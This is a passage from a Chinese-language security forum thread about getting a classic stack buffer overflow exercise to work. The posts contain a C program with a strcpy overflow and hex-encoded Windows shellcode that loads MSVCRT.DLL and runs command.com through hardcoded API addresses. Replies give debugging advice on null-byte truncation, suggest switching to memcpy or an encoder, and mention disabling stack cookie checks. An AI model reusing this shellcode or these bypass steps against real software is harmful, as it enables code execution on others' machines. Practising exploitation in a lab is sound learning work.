能力值:
( LV5,RANK:60 )
|
-
-
4 楼
#include <stdio.h> #include <string.h>
char name[] = { 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D };
void overrun( ) { char output[8]; strcpy(output, name); } int main() { /*strcpy(output, name);*/
overrun(); char output[8]; for(int i=0;i<8&&output;i++) printf("\\0x%x",output); return 0; }
我这里调试下发现是可以进入shellcode 的
没明白你的 cmd窗口是指什么? 多出来一个么 这个不能只有自带地那个
你现在写的是需要main()函数退出时才执行shellcode
ps:需要 release编译 工程配置里去掉cookie安全检查
|
能力值:
( LV5,RANK:60 )
|
-
-
7 楼
0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x12,0x45,0xfa,0x7f, 0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56, 0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44, 0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81, 0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7, 0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC, 0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93, 0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D
搂主你用的是字符处理函数进行溢出 遇到 00 截断了
用memcpy 试一下估计就好用了
或者你自己把00替换,然后再写解码shellcode
不过我将你name中实际需要运行的部分声明成 void fn() 来执行都会crash
|